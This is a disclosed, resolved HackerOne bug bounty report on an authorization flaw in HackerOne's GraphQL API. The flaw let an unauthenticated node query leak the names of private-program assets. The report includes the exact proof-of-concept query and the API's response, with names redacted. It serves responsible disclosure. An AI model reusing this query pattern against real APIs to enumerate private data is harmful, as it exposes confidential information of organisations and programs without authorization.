Disclosing PolicyPageAssetGroup in Private Programs via /graphql `gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/{id}`

Disclosed: 2025-01-21 17:52:54 By haxta4ok00 To security
Critical
Vulnerability Details
**Summary:** Hi team, I understand what's going on **Description:** Just a recent update gives the results of private programs ### Steps To Reproduce Without authorization GraphQL: `{"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3981-41287\"){... on PolicyPageAssetGroupDocument{id,name}}}"}` Answer: `{"data":{"node":{"id":"Z2lkOi8vaGFja2Vyb25lL1BvbGljeVBhZ2VBc3NldEdyb3Vwc0luZGV4OjpQb2xpY3lQYWdlQXNzZXRHcm91cC8zOTgxLTQxMjg3","name":"██████"}}}` This is Asset program - █████████ Thanks! ## Impact Disclosing Sсope(Assets) in Private Programs
Actions
View on HackerOne
Report Stats
  • Report ID: 1618347
  • State: Closed
  • Substate: resolved
  • Upvotes: 16
Share this report